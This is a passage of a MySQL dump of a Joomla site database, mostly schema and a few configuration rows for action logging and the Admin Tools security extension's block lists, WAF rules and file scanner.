-- MySQL dump 10.13  Distrib 8.0.46, for Linux (x86_64)
--
-- Host: localhost    Database: ledbazaa_3s_3
-- ------------------------------------------------------
-- Server version	8.0.46-cll-lve

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `fz6t4_action_log_config`
--

DROP TABLE IF EXISTS `fz6t4_action_log_config`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_action_log_config` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `type_title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `type_alias` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `id_holder` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `title_holder` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `table_name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `text_prefix` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_action_log_config`
--

LOCK TABLES `fz6t4_action_log_config` WRITE;
/*!40000 ALTER TABLE `fz6t4_action_log_config` DISABLE KEYS */;
INSERT INTO `fz6t4_action_log_config` VALUES (1,'article','com_content.article','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(2,'article','com_content.form','id','title','#__content','PLG_ACTIONLOG_JOOMLA'),(3,'banner','com_banners.banner','id','name','#__banners','PLG_ACTIONLOG_JOOMLA'),(4,'user_note','com_users.note','id','subject','#__user_notes','PLG_ACTIONLOG_JOOMLA'),(5,'media','com_media.file','','name','','PLG_ACTIONLOG_JOOMLA'),(6,'category','com_categories.category','id','title','#__categories','PLG_ACTIONLOG_JOOMLA'),(7,'menu','com_menus.menu','id','title','#__menu_types','PLG_ACTIONLOG_JOOMLA'),(8,'menu_item','com_menus.item','id','title','#__menu','PLG_ACTIONLOG_JOOMLA'),(9,'newsfeed','com_newsfeeds.newsfeed','id','name','#__newsfeeds','PLG_ACTIONLOG_JOOMLA'),(10,'link','com_redirect.link','id','old_url','#__redirect_links','PLG_ACTIONLOG_JOOMLA'),(11,'tag','com_tags.tag','id','title','#__tags','PLG_ACTIONLOG_JOOMLA'),(12,'style','com_templates.style','id','title','#__template_styles','PLG_ACTIONLOG_JOOMLA'),(13,'plugin','com_plugins.plugin','extension_id','name','#__extensions','PLG_ACTIONLOG_JOOMLA'),(14,'component_config','com_config.component','extension_id','name','','PLG_ACTIONLOG_JOOMLA'),(15,'contact','com_contact.contact','id','name','#__contact_details','PLG_ACTIONLOG_JOOMLA'),(16,'module','com_modules.module','id','title','#__modules','PLG_ACTIONLOG_JOOMLA'),(17,'access_level','com_users.level','id','title','#__viewlevels','PLG_ACTIONLOG_JOOMLA'),(18,'banner_client','com_banners.client','id','name','#__banner_clients','PLG_ACTIONLOG_JOOMLA'),(19,'application_config','com_config.application','','name','','PLG_ACTIONLOG_JOOMLA');
/*!40000 ALTER TABLE `fz6t4_action_log_config` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_action_logs`
--

DROP TABLE IF EXISTS `fz6t4_action_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_action_logs` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `message_language_key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `message` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `log_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `extension` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_id` int NOT NULL DEFAULT '0',
  `item_id` int NOT NULL DEFAULT '0',
  `ip_address` varchar(40) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0.0.0.0',
  PRIMARY KEY (`id`),
  KEY `idx_user_id` (`user_id`),
  KEY `idx_user_id_logdate` (`user_id`,`log_date`),
  KEY `idx_user_id_extension` (`user_id`,`extension`),
  KEY `idx_extension_item_id` (`extension`,`item_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_action_logs`
--

LOCK TABLES `fz6t4_action_logs` WRITE;
/*!40000 ALTER TABLE `fz6t4_action_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_action_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_action_logs_extensions`
--

DROP TABLE IF EXISTS `fz6t4_action_logs_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_action_logs_extensions` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `extension` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=19 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_action_logs_extensions`
--

LOCK TABLES `fz6t4_action_logs_extensions` WRITE;
/*!40000 ALTER TABLE `fz6t4_action_logs_extensions` DISABLE KEYS */;
INSERT INTO `fz6t4_action_logs_extensions` VALUES (1,'com_banners'),(2,'com_cache'),(3,'com_categories'),(4,'com_config'),(5,'com_contact'),(6,'com_content'),(7,'com_installer'),(8,'com_media'),(9,'com_menus'),(10,'com_messages'),(11,'com_modules'),(12,'com_newsfeeds'),(13,'com_plugins'),(14,'com_redirect'),(15,'com_tags'),(16,'com_templates'),(17,'com_users'),(18,'com_checkin');
/*!40000 ALTER TABLE `fz6t4_action_logs_extensions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_action_logs_users`
--

DROP TABLE IF EXISTS `fz6t4_action_logs_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_action_logs_users` (
  `user_id` int unsigned NOT NULL,
  `notify` tinyint unsigned NOT NULL,
  `extensions` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`user_id`),
  KEY `idx_notify` (`notify`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_action_logs_users`
--

LOCK TABLES `fz6t4_action_logs_users` WRITE;
/*!40000 ALTER TABLE `fz6t4_action_logs_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_action_logs_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_acl`
--

DROP TABLE IF EXISTS `fz6t4_admintools_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_acl` (
  `user_id` bigint unsigned NOT NULL,
  `permissions` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_acl`
--

LOCK TABLES `fz6t4_admintools_acl` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_acl` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_adminiplist`
--

DROP TABLE IF EXISTS `fz6t4_admintools_adminiplist`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_adminiplist` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_adminiplist`
--

LOCK TABLES `fz6t4_admintools_adminiplist` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_adminiplist` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_adminiplist` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_badwords`
--

DROP TABLE IF EXISTS `fz6t4_admintools_badwords`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_badwords` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `word` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`),
  UNIQUE KEY `word` (`word`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_badwords`
--

LOCK TABLES `fz6t4_admintools_badwords` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_badwords` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_badwords` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_cookies`
--

DROP TABLE IF EXISTS `fz6t4_admintools_cookies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_cookies` (
  `series` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_hash` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `valid_to` datetime DEFAULT NULL,
  PRIMARY KEY (`series`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_cookies`
--

LOCK TABLES `fz6t4_admintools_cookies` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_cookies` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_cookies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_customperms`
--

DROP TABLE IF EXISTS `fz6t4_admintools_customperms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_customperms` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `path` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `perms` varchar(4) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT '0644',
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`),
  KEY `fz6t4_admintools_customperms_path` (`path`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_customperms`
--

LOCK TABLES `fz6t4_admintools_customperms` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_customperms` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_customperms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_filescache`
--

DROP TABLE IF EXISTS `fz6t4_admintools_filescache`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_filescache` (
  `admintools_filescache_id` bigint NOT NULL AUTO_INCREMENT,
  `path` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `filedate` int NOT NULL DEFAULT '0',
  `filesize` int NOT NULL DEFAULT '0',
  `data` blob,
  `checksum` varchar(32) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`admintools_filescache_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_filescache`
--

LOCK TABLES `fz6t4_admintools_filescache` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_filescache` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_filescache` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_ipautoban`
--

DROP TABLE IF EXISTS `fz6t4_admintools_ipautoban`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_ipautoban` (
  `ip` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `reason` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT 'other',
  `until` datetime DEFAULT NULL,
  PRIMARY KEY (`ip`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_ipautoban`
--

LOCK TABLES `fz6t4_admintools_ipautoban` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_ipautoban` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_ipautoban` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_ipautobanhistory`
--

DROP TABLE IF EXISTS `fz6t4_admintools_ipautobanhistory`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_ipautobanhistory` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `reason` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT 'other',
  `until` datetime DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_ipautobanhistory`
--

LOCK TABLES `fz6t4_admintools_ipautobanhistory` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_ipautobanhistory` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_ipautobanhistory` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_ipblock`
--

DROP TABLE IF EXISTS `fz6t4_admintools_ipblock`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_ipblock` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `ip` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_ipblock`
--

LOCK TABLES `fz6t4_admintools_ipblock` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_ipblock` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_ipblock` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_log`
--

DROP TABLE IF EXISTS `fz6t4_admintools_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_log` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `logdate` datetime NOT NULL,
  `ip` varchar(40) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `url` varchar(10240) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `reason` enum('other','admindir','awayschedule','adminpw','ipwl','ipbl','sqlishield','antispam','tpone','tmpl','template','muashield','csrfshield','badbehaviour','geoblocking','rfishield','dfishield','uploadshield','xssshield','httpbl','loginfailure','securitycode','sessionshield','external','nonewadmins','nonewfrontendadmins','configmonitor','phpshield','404shield','itemidshield','susparam') CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `extradata` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`),
  KEY `fz6t4_admintools_log_logdate_reason` (`logdate`,`reason`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_log`
--

LOCK TABLES `fz6t4_admintools_log` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_profiles`
--

DROP TABLE IF EXISTS `fz6t4_admintools_profiles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_profiles` (
  `id` int unsigned NOT NULL AUTO_INCREMENT,
  `description` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `configuration` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `filters` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_profiles`
--

LOCK TABLES `fz6t4_admintools_profiles` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_profiles` DISABLE KEYS */;
INSERT INTO `fz6t4_admintools_profiles` VALUES (1,'Default PHP Change Scanner Profile','','');
/*!40000 ALTER TABLE `fz6t4_admintools_profiles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_redirects`
--

DROP TABLE IF EXISTS `fz6t4_admintools_redirects`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_redirects` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `source` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `dest` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `ordering` bigint NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '1',
  `keepurlparams` tinyint(1) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_redirects`
--

LOCK TABLES `fz6t4_admintools_redirects` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_redirects` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_redirects` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_scanalerts`
--

DROP TABLE IF EXISTS `fz6t4_admintools_scanalerts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_scanalerts` (
  `admintools_scanalert_id` bigint NOT NULL AUTO_INCREMENT,
  `path` varchar(2048) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `scan_id` bigint NOT NULL DEFAULT '0',
  `diff` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `threat_score` int NOT NULL DEFAULT '0',
  `acknowledged` tinyint NOT NULL DEFAULT '0',
  PRIMARY KEY (`admintools_scanalert_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_scanalerts`
--

LOCK TABLES `fz6t4_admintools_scanalerts` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_scanalerts` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_scanalerts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_scans`
--

DROP TABLE IF EXISTS `fz6t4_admintools_scans`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_scans` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `comment` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci,
  `scanstart` timestamp NULL DEFAULT NULL,
  `scanend` timestamp NULL DEFAULT NULL,
  `status` enum('run','fail','complete') CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'run',
  `origin` varchar(30) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'backend',
  `totalfiles` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_scans`
--

LOCK TABLES `fz6t4_admintools_scans` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_scans` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_scans` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_storage`
--

DROP TABLE IF EXISTS `fz6t4_admintools_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_storage` (
  `key` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `value` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`key`(100))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_storage`
--

LOCK TABLES `fz6t4_admintools_storage` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_storage` DISABLE KEYS */;
INSERT INTO `fz6t4_admintools_storage` VALUES ('cparams','{\"quickstart\":1,\"superuserslist\":0,\"disabled_superuserslist\":1}'),('fixperms_stack','{\"folders\":[],\"files\":[],\"total\":0,\"done\":0}');
/*!40000 ALTER TABLE `fz6t4_admintools_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_tempsupers`
--

DROP TABLE IF EXISTS `fz6t4_admintools_tempsupers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_tempsupers` (
  `user_id` bigint NOT NULL,
  `expiration` datetime NOT NULL,
  PRIMARY KEY (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_tempsupers`
--

LOCK TABLES `fz6t4_admintools_tempsupers` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_tempsupers` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_tempsupers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_wafblacklists`
--

DROP TABLE IF EXISTS `fz6t4_admintools_wafblacklists`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_wafblacklists` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `option` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `view` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `task` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `query` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `query_type` varchar(1) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `query_content` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `verb` varchar(6) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `application` enum('site','admin','both') CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'site',
  `enabled` tinyint NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_wafblacklists`
--

LOCK TABLES `fz6t4_admintools_wafblacklists` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_wafblacklists` DISABLE KEYS */;
INSERT INTO `fz6t4_admintools_wafblacklists` VALUES (1,'','','','list[select]','E','!#^[\\p{L}\\d,\\s]+$#iu','','site',1),(2,'com_users','','','user[groups]','P','','','site',1),(3,'com_content','category','','type','R','!#^[a-z][a-z\\-_0-9]{2,}$#i','','site',1);
/*!40000 ALTER TABLE `fz6t4_admintools_wafblacklists` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_admintools_wafexceptions`
--

DROP TABLE IF EXISTS `fz6t4_admintools_wafexceptions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_admintools_wafexceptions` (
  `id` bigint unsigned NOT NULL AUTO_INCREMENT,
  `option` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `view` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `query` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_admintools_wafexceptions`
--

LOCK TABLES `fz6t4_admintools_wafexceptions` WRITE;
/*!40000 ALTER TABLE `fz6t4_admintools_wafexceptions` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_admintools_wafexceptions` ENABLE KEYS */;
UNLOCK TABLES;

--
